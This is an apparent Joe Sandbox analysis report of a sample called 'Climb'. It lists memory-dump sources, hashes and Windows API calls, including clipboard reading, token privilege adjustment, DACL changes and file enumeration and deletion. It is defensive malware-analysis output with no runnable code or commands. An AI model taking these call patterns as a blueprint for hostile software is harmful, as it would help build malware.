                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: __fread_nolock
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2638373210-0
                                                                                                                                                                          • Opcode ID: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
                                                                                                                                                                          • Instruction ID: e95bd1eefff29369d542d247f1ef23fc21238251d389d450c86306ac418d4b27
                                                                                                                                                                          • Opcode Fuzzy Hash: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
                                                                                                                                                                          • Instruction Fuzzy Hash: 01F0F87590020DFFDF05DF90C941EAEBB79FF04318F208445F9159A151C336EA21ABA1
                                                                                                                                                                          APIs
                                                                                                                                                                          • Shell_NotifyIconW.SHELL32(00000002,?), ref: 00A63963
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: IconNotifyShell_
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1144537725-0
                                                                                                                                                                          • Opcode ID: cb710e19309c7fc0f2a5edc7b66ab13c2b1e4d604125ac12ae98ef09c0a6a1ec
                                                                                                                                                                          • Instruction ID: 1e7809ee77b136116c0c26980f459046b923539352d66f9d4efb21f778a41fb7
                                                                                                                                                                          • Opcode Fuzzy Hash: cb710e19309c7fc0f2a5edc7b66ab13c2b1e4d604125ac12ae98ef09c0a6a1ec
                                                                                                                                                                          • Instruction Fuzzy Hash: AFF037719143149FEB52DF64EC457997BFCA70170CF1000A5A644A7181DB745789CF55
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00A63A76
                                                                                                                                                                            • Part of subcall function 00A68577: _wcslen.LIBCMT ref: 00A6858A
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: LongNamePath_wcslen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 541455249-0
                                                                                                                                                                          • Opcode ID: cbade96dd659009ef42bd475b69e432b33a8c310a516cd2129f365d472e19b70
                                                                                                                                                                          • Instruction ID: becaa9ff7621bd104e550d9a2e76ac2a14890a7ff404a9b3c10550ee92e7aa30
                                                                                                                                                                          • Opcode Fuzzy Hash: cbade96dd659009ef42bd475b69e432b33a8c310a516cd2129f365d472e19b70
                                                                                                                                                                          • Instruction Fuzzy Hash: E0E0C272A002245BCB21E29C9C0AFEE77EDDFC87A0F0441B1FC09D7258EA64ED80C690
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateFileW.KERNEL32(00000000,00000000,?,00AA0A84,?,?,00000000,?,00AA0A84,00000000,0000000C), ref: 00AA0737
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 823142352-0
                                                                                                                                                                          • Opcode ID: 62178bef9a583fc086bf57db4b1a6d42f5e35ba17bb8734352d97e1586173bd3
                                                                                                                                                                          • Instruction ID: f8107b9d1fe48319820b6b6c5aeae1511dc9afa37ae1c0d5cdadb26f8b0301f3
                                                                                                                                                                          • Opcode Fuzzy Hash: 62178bef9a583fc086bf57db4b1a6d42f5e35ba17bb8734352d97e1586173bd3
                                                                                                                                                                          • Instruction Fuzzy Hash: F0D06C3200010DBBDF028F84DD06EDA3BAAFB48714F014100BE1856020C732E832EB94
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetFileAttributesW.KERNEL32(?,00ACD840), ref: 00ACEAB1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                                          • Opcode ID: 60c69f5043233c60854a7c87f0b1db7c7f7e14a2bf467ee32ad98d43630816c7
                                                                                                                                                                          • Instruction ID: cdddd613b2c6b73a09dcdbce70ed3db3e815235e3538b1526f088dee76511577
                                                                                                                                                                          • Opcode Fuzzy Hash: 60c69f5043233c60854a7c87f0b1db7c7f7e14a2bf467ee32ad98d43630816c7
                                                                                                                                                                          • Instruction Fuzzy Hash: 9DB0923400060009AD288B785A0DEA9330178423E67DE1BC8E479850E1D33A880FE990
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00ACDC54: FindFirstFileW.KERNEL32(?,?), ref: 00ACDCCB
                                                                                                                                                                            • Part of subcall function 00ACDC54: DeleteFileW.KERNEL32(?,?,?,?), ref: 00ACDD1B
                                                                                                                                                                            • Part of subcall function 00ACDC54: FindNextFileW.KERNELBASE(00000000,00000010), ref: 00ACDD2C
                                                                                                                                                                            • Part of subcall function 00ACDC54: FindClose.KERNEL32(00000000), ref: 00ACDD43
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00AD666E
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2191629493-0
                                                                                                                                                                          • Opcode ID: 3c9527bff52aa211fec0e596c0274e573fef4ea0e9603325a3562b19bd581c3d
                                                                                                                                                                          • Instruction ID: 5c88ca197cd8be2908a766f4dce56bba49eea5a5f17fd6a52c379c2189c7b099
                                                                                                                                                                          • Opcode Fuzzy Hash: 3c9527bff52aa211fec0e596c0274e573fef4ea0e9603325a3562b19bd581c3d
                                                                                                                                                                          • Instruction Fuzzy Hash: 3BF08C362002008FCB14EF58D955B6EB7E9AF88320F048419F90A8B352CB74FC01DB90
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00AC2010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00AC205A
                                                                                                                                                                            • Part of subcall function 00AC2010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00AC2087
                                                                                                                                                                            • Part of subcall function 00AC2010: GetLastError.KERNEL32 ref: 00AC2097
                                                                                                                                                                          • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00AC1BD2
                                                                                                                                                                          • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00AC1BF4
                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00AC1C05
                                                                                                                                                                          • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00AC1C1D
                                                                                                                                                                          • GetProcessWindowStation.USER32 ref: 00AC1C36
                                                                                                                                                                          • SetProcessWindowStation.USER32(00000000), ref: 00AC1C40
                                                                                                                                                                          • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00AC1C5C
                                                                                                                                                                            • Part of subcall function 00AC1A0B: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00AC1B48), ref: 00AC1A20
                                                                                                                                                                            • Part of subcall function 00AC1A0B: CloseHandle.KERNEL32(?,?,00AC1B48), ref: 00AC1A35
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                                                                                                                          • String ID: $default$winsta0
                                                                                                                                                                          • API String ID: 22674027-1027155976
                                                                                                                                                                          • Opcode ID: cfa42e163a0943a18cd67adbb14767df385b88e4cd9337998caf60afd91712da
                                                                                                                                                                          • Instruction ID: 45175cba28cdc14d78a8a5840f7e95f6425169881f32bf00fd30974a7eb84afb
                                                                                                                                                                          • Opcode Fuzzy Hash: cfa42e163a0943a18cd67adbb14767df385b88e4cd9337998caf60afd91712da
                                                                                                                                                                          • Instruction Fuzzy Hash: 56817871A00209ABDF12DFE4DD49FFE7BB9EF09300F154129F916A61A1EB718946CB60
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00AC1A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00AC1A60
                                                                                                                                                                            • Part of subcall function 00AC1A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,00AC14E7,?,?,?), ref: 00AC1A6C
                                                                                                                                                                            • Part of subcall function 00AC1A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00AC14E7,?,?,?), ref: 00AC1A7B
                                                                                                                                                                            • Part of subcall function 00AC1A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00AC14E7,?,?,?), ref: 00AC1A82
                                                                                                                                                                            • Part of subcall function 00AC1A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00AC1A99
                                                                                                                                                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00AC1518
                                                                                                                                                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00AC154C
                                                                                                                                                                          • GetLengthSid.ADVAPI32(?), ref: 00AC1563
                                                                                                                                                                          • GetAce.ADVAPI32(?,00000000,?), ref: 00AC159D
                                                                                                                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00AC15B9
                                                                                                                                                                          • GetLengthSid.ADVAPI32(?), ref: 00AC15D0
                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00AC15D8
                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 00AC15DF
                                                                                                                                                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00AC1600
                                                                                                                                                                          • CopySid.ADVAPI32(00000000), ref: 00AC1607
                                                                                                                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00AC1636
                                                                                                                                                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00AC1658
                                                                                                                                                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00AC166A
                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00AC1691
                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 00AC1698
                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00AC16A1
                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 00AC16A8
                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00AC16B1
                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 00AC16B8
                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00AC16C4
                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 00AC16CB
                                                                                                                                                                            • Part of subcall function 00AC1ADF: GetProcessHeap.KERNEL32(00000008,00AC14FD,?,00000000,?,00AC14FD,?), ref: 00AC1AED
                                                                                                                                                                            • Part of subcall function 00AC1ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,00AC14FD,?), ref: 00AC1AF4
                                                                                                                                                                            • Part of subcall function 00AC1ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00AC14FD,?), ref: 00AC1B03
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4175595110-0
                                                                                                                                                                          • Opcode ID: 319544f34afece2e089e45928dc903f478b2c6ac4c4400303022fca597e540fe
                                                                                                                                                                          • Instruction ID: abbcf63474107b0f5d2ae4a72cee3d4938d17290b6705520dc8b5554e1babe95
                                                                                                                                                                          • Opcode Fuzzy Hash: 319544f34afece2e089e45928dc903f478b2c6ac4c4400303022fca597e540fe
                                                                                                                                                                          • Instruction Fuzzy Hash: C6715CB2A00209ABDF11DFE5DC48FAEBBB9FF05340F194519E915E7291DB319906CBA0
                                                                                                                                                                          APIs
                                                                                                                                                                          • OpenClipboard.USER32(00AFDCD0), ref: 00ADF586
                                                                                                                                                                          • IsClipboardFormatAvailable.USER32(0000000D), ref: 00ADF594
                                                                                                                                                                          • GetClipboardData.USER32(0000000D), ref: 00ADF5A0
                                                                                                                                                                          • CloseClipboard.USER32 ref: 00ADF5AC
                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00ADF5E4
                                                                                                                                                                          • CloseClipboard.USER32 ref: 00ADF5EE
                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00ADF619
                                                                                                                                                                          • IsClipboardFormatAvailable.USER32(00000001), ref: 00ADF626
                                                                                                                                                                          • GetClipboardData.USER32(00000001), ref: 00ADF62E
                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00ADF63F
                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00ADF67F
                                                                                                                                                                          • IsClipboardFormatAvailable.USER32(0000000F), ref: 00ADF695
                                                                                                                                                                          • GetClipboardData.USER32(0000000F), ref: 00ADF6A1
                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00ADF6B2
                                                                                                                                                                          • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00ADF6D4
                                                                                                                                                                          • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00ADF6F1
                                                                                                                                                                          • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00ADF72F
                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00ADF750
                                                                                                                                                                          • CountClipboardFormats.USER32 ref: 00ADF771
                                                                                                                                                                          • CloseClipboard.USER32 ref: 00ADF7B6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 420908878-0
                                                                                                                                                                          • Opcode ID: 38185d1c2649c6b69b052b52ffea095137ce2961c90958047e58701c053aa912
                                                                                                                                                                          • Instruction ID: b559aaa898d7c517f25f58a76e1716896571f484324c6cfd053b6266e9608833
                                                                                                                                                                          • Opcode Fuzzy Hash: 38185d1c2649c6b69b052b52ffea095137ce2961c90958047e58701c053aa912
                                                                                                                                                                          • Instruction Fuzzy Hash: 7F617F352042419FD301EF64D889F6BB7B5AF84708F14456AF457C73A2DB31E946CB61
                                                                                                                                                                          APIs
                                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00AD7403
                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00AD7457
                                                                                                                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00AD7493
                                                                                                                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00AD74BA
                                                                                                                                                                            • Part of subcall function 00A6B329: _wcslen.LIBCMT ref: 00A6B333
                                                                                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00AD74F7
                                                                                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00AD7524
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                                                                                                                          • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                                                                                                          • API String ID: 3830820486-3289030164
                                                                                                                                                                          • Opcode ID: 98dd6f7d8150c132e8a1100845034b0b83e014bd56e95420aac0ea1813073aad
                                                                                                                                                                          • Instruction ID: 4a3a731ba2273f3827241514f44a9b86fe94d6fa33710c52d542f3e0e0d91276
                                                                                                                                                                          • Opcode Fuzzy Hash: 98dd6f7d8150c132e8a1100845034b0b83e014bd56e95420aac0ea1813073aad
                                                                                                                                                                          • Instruction Fuzzy Hash: 98D15D72508304AEC304EBA4C995EAFB7FCAF88704F40491AF599D7292EB74DA44C762
                                                                                                                                                                          APIs
                                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?,76E18FB0,?,00000000), ref: 00ADA0A8
                                                                                                                                                                          • GetFileAttributesW.KERNEL32(?), ref: 00ADA0E6
                                                                                                                                                                          • SetFileAttributesW.KERNEL32(?,?), ref: 00ADA100
                                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00ADA118
                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00ADA123
                                                                                                                                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 00ADA13F
                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00ADA18F
                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(00B27B94), ref: 00ADA1AD
                                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00ADA1B7
                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00ADA1C4
                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00ADA1D4
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                                                          • String ID: *.*
                                                                                                                                                                          • API String ID: 1409584000-438819550
                                                                                                                                                                          • Opcode ID: 1caaa1c599444035f56ff13414fb9dbc1d43f5c00de38c49144c86c8122bd9d7
                                                                                                                                                                          • Instruction ID: 8952c9b219a86d166ff8342d7d78653154ee31aa4f521017e30b1e2d3aa43e21
                                                                                                                                                                          • Opcode Fuzzy Hash: 1caaa1c599444035f56ff13414fb9dbc1d43f5c00de38c49144c86c8122bd9d7
                                                                                                                                                                          • Instruction Fuzzy Hash: AE31F5315012196BDF15EFF4DC4DAEE73ADAF14320F000292F816D2190EB74DA85CA65
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00AD4785
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00AD47B2
                                                                                                                                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 00AD47E2
                                                                                                                                                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00AD4803
                                                                                                                                                                          • RemoveDirectoryW.KERNEL32(?), ref: 00AD4813
                                                                                                                                                                          • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00AD489A
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00AD48A5
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00AD48B0
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
